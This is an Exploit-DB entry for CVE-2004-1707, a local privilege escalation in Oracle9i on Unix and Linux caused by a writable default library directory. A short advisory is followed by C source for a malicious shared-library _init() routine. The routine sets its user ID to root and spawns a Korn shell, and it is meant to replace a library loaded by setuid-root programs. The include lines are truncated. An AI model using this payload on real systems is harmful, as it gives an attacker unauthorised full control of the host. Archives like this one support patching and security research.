Oracle9i Database - Default Library Directory Privilege Escalation

EDB-ID:

24335

CVE:

2004-1707

EDB Verified:

Author:

Juan Manuel Pascual Escribá

Type:

local

Exploit:   /  

Platform:

Unix

Date:

2004-07-30

Vulnerable App: 
source: https://www.securityfocus.com/bid/10829/info

Oracle database implementations are reportedly prone to a default library directory privilege escalation vulnerability. This issue arises due to a default configuration error that will permit the attacker to replace libraries required by setuid root applications with arbitrary code.

This issue would allow an Oracle software owner to execute code as the superuser, taking control of the entire system.

It should be noted that this vulnerability only affects Oracle on UNIX/Linux platforms.

#include
#include

_init() {
printf("en el _init()\n");
printf("Con PID=%i y EUID=%i",getpid(),getuid());
setuid(0);
system("/usr/bin/ksh");
printf("Saliendo del Init()\n");
}
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services